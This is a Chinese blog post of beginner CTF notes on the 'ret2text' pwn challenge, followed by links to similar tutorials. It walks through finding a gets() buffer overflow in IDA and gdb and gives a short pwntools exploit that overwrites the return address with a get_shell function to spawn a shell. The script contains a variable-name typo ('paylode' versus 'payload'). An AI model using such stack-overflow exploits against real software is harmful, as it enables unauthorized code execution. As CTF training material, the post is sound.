ret2text学习笔记 --- PWN入门题目

最新推荐文章于 2024-02-04 23:58:21 发布
最新推荐文章于 2024-02-04 23:58:21 发布
阅读量458 收藏 5
点赞数
分类专栏: PWN学习笔记 文章标签: pwn学习笔记 python ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xindada559/article/details/117741602
版权

最近学习了B站上的有关PWN的入门视频课,简单写点笔记,学习一下叭

先上下学习链接,大佬讲的很细致,多听两遍总没坏处。

XMCVE 2020 CTF Pwn入门课程

首先先把 ret2text放在IDA中F5一下,反汇编内容如下

前两行不用管,点击vulnerable看下有什么

有buf数组,很有可能是缓冲区溢出的题目

然后还看到左侧有个get_shell文件

所以,shell一定就在这里面了,我们的目标就是让gets后的buffer溢出,溢出到return部分,将return的地址改为get_shell的地址

先通过gdb动态看下ebp等的地址:

在存放有ret2text的文件中输入

gdb ret2text 
b main  #在main函数处设置断点
run    #运行
n     #一直输入到有vulnerable的位置
然后按 s
之后按 n 回车后输入
AAAAAAAA (八个垃圾数据)
然后输入  stack 24

 

结果如上图,就会发现eax处是存放着我们刚刚输入的buffer中的数据(四字节),我们要将数据填充到ebp的位置,即0xffffd138处,而后还要继续填充到ebp的下一个位置,即往高一个(返回地址)因此再加 4B

而ebp和edx中间的相差 可以通过:

实现,当然这个题比较简单,直接可以是16+4个字节填充。

然后再加上需要执行的get_shell的地址:

即0x8048522

所以核心代码:

payload = b'a'*(16+4) + p32(0x8048522)

具体代码可以写个小脚本:

from pwn import*
io = process('./ret2text')
paylode = b'a'*(16+4) + p32(0x8048522)
io.sendline(payload)
io.interactive()

执行结果如下:

通过ls就发现获得了shell权限

努力努力更努力NA
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
pwn小白入门03---ret2text
weixin_45943522的博客
02-21 6294
什么是栈溢出: 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变(比如gets函数,他不会去验证你输入的值的长度,通过这个函数,你可以往一个本身大小为4字节的数组中填入任意大小的数据,如果填入8字节的数据,将会导致栈溢出,进而程序报错)。就像是往杯子里倒水,水满了溢出来最后烫到你一样。 最简单的栈溢出利用:ret2text 通过栈溢出修改call指令保存在栈上的返回地址(eip的值),这样cpu执行ret指令的时候,就会将被修改的值从栈上取
pwn入门之ret2text
wangxunyu6的博客
01-07 1203
重点来了:存在gets函数,先让我们了解一下gets函数,它可以无限读入数据,造成栈溢出。观察到s变量距离ebp有0x28的距离,对于这个题来说栈结构为先读入s变量然后下面是ebp然后才是返回地址,那么我们就有思路了,往s变量里面填充垃圾数据直到返回地址把返回地址改为我们需要的flag的位置。第四行:这是我们人为构造的代码数据,根据思路填充垃圾数据0x28个,因为这是32位elf文件所以需要再加上4,p32(flag)即为我们的返回地址。0不用管buf是我们输入数据的地方,0x32是能写入的字节数。
pwn学习笔记(2)ret_2_text_or_shellcode
qq_66013948的博客
02-04 1366
​ ax寄存器:通用寄存器,可用于存放多种数据​ bp寄存器:存放的是栈帧的栈底地址​ sp寄存器:存放的是栈顶的地址​ 栈帧是存储函数的一些信息的地方,栈帧存储有函数的局部变量,传递给子函数的实际参数,父函数的地址以及上一个栈帧栈底的地址,大致情况如下:​ 在函数调用的过程中,首先会讲bp寄存器的值进行压栈,以方便在恢复的时候恢复栈底寄存器的值,再之后,会按顺序将局部变量压栈,最后是子函数的实际参数,会按照先入栈的后出栈,从最后一个实际参数先入栈再到第一个实际参数,比如函数a(int a ,
PWN初体验之ret2text
weixin_43137410的博客
08-04 672
"Hello,World!"的浪漫可能只有直男才懂!
基础ROP之:ret2text,ret2libc,ret2syscall,ret2shellcode
WdIg-2023的博客
01-30 1130
在上一篇文章中学习了gdb和pwntools的基本使用后,这篇文章来带领大家入门pwn,包括:ret2text,ret2libc,ret2syscall,ret2shellcode。
入门pwn题目ret2text
03-26
入门pwn题目ret2text
Ucos-2学习笔记
08-10
《Ucos-2学习笔记》 嵌入式系统开发中,使用操作系统是提升效率和应对复杂性的关键。本文主要探讨UCOS-II,一种适合小型系统的实时操作系统(RTOS)。UCOS-II以其轻量级、高效及源码开放的特点,广泛应用于各种嵌入式...
ret2-libc3-puts
04-01
ret2-libc3-puts
ret2-libc-puts64
最新发布
04-01
ret2-libc-puts64
STM32F401RET6 移植ucos-iii
01-21
5. **参考资料**:正点原子和官方文档是学习和实践STM32F401RET6移植UCOS-III的重要资源。正点原子是国内知名的嵌入式教育平台,其教程通俗易懂,实操性强;官方文档则提供了详细的硬件和软件信息,是理解微控制器...
pwn基本ROP——ret2text
turtlesd的博客
04-25 854
ret2text环境原理漏洞分析利用`checksec [file_name]`指令获取可执行文件的保护措施开放情况利用IDA32位进行调试利用pwndbg获取偏移量payload 环境 ret2text 原理 控制主函数的return返回到文件函数中自带的system函数的地址,从而获得最高权限 漏洞分析 利用checksec [file_name]指令获取可执行文件的保护措施开放情况 命令: checksec ret2text 可以看到,该可执行文件是32位的,仅开启了NX堆栈不可执行保护。 也就是
pwn笔记 - ret2text - 函数传参(x86&x64)
weixin_44227244的博客
09-06 3242
pwn笔记 - ret2text - 函数传参
pwn入门(2):ROP攻击的原理,缓冲区溢出漏洞利用(ret2text+ret2shellcode)
Bossfrank的博客
04-18 3121
本节将介绍基本的ROP(Return-Oriented Programming,返回导向编程的)的攻击原理、二进制程序的保护机制,并通过两个实例ret2text、ret2shellcode,为读者简介基本的ROP攻击过程。本节所使用的实例可在CTF wiki上进行下载。
pwn】学pwn日记(栈学习)(随缘更新)
woodwhale的博客
08-04 5365
pwn】学pwn日记(持续更新) 前言 从8.2开始系统性学习pwn,在此之前,学习了部分汇编指令以及32位c语言程序的堆栈图及函数调用。 文章中的部分图片来自于教学视频 学习视频链接:XMCVE 2020 CTF Pwn入门课程、【星盟安全】PWN系列教程(持续更新) 学习文章链接: CTF Wiki elf文件 未初始化的全局变量glb,编译出来在内存中bss中 初始化的全局变量str(没有被修改过),编译出来在内存中data 而hello world在text段中 main和sum
ret2text
m0_49959202的博客
09-18 223
文章目录ret2text1.检查保护机制2.ida分析程序3.exp编写 ret2text 进程存在危险函数如system(“/bin”)或execv(“/bin/sh”,0,0)的片段,可以直接劫持返回地址到目标函数地址上,从而获取shell。 1.检查保护机制 首先调用checksec,检查保护机制: 发现pie没有开启 2.ida分析程序 使用ida打开程序ret2text,静态分析: 发现main函数中存在函数:vulnerable(),里面有危险函数gets(),可以用来进行栈溢出 发现
pwn零基础入门
热门推荐
weixin_45948183的博客
03-24 1万+
pwn零基础入门 很多初学者在初学pwn的时候,对pwn可能存在许多疑问,学什么,怎么学,今天和大家分享一下刚学pwn的一些资料的学习历程。 首先分享一下pwn的一系列学习资料 一、首先语言基础得打牢,1、汇编语言,《汇编语言—王爽》2、编程语言(C语言和python)C语言必须要会,题目大部分是用C语言写的,而且很多那些知识都要读libc的源代码。会python,exp用python写的,CTF...
PWN学习目录(持续更新)
山楂的博客
03-09 5876
一些PWN入门学习资料
pwn基础之ctfwiki-栈溢出-基本ROP-ret2text
qq_52658640的博客
04-21 997
文章目录前言原理ret2text发现漏洞利用漏洞书写exp总结 前言 刚开始自己的二进制生涯,想记录一下自己的学习,如有错误还请大佬们斧正。 原理 ret2text 即控制程序执行程序本身已有的的代码 (.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。 这时,我们需要知道对应返回的代码的位置。当然程序也可能会开启某些保护,我们需要想办法去绕过这些保护。 ret2tex
跟着CTF-wiki学pwn——ret2text
qq_42882717的博客
06-21 1064
肾么叫做万死不辞呀,就是每天被气死一万次,也不辞职…(哭哭
S7-SCL编程指南:从入门到实践
S7-SCL编程是西门子Step7编程软件中的一种高级语言,它基于结构化文本(Structured Text, STL),提供了更接近于传统高级编程语言的语法,使得PLC编程更加灵活和高效。S7-SCL允许程序员使用类似C或Pascal的语句进行...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值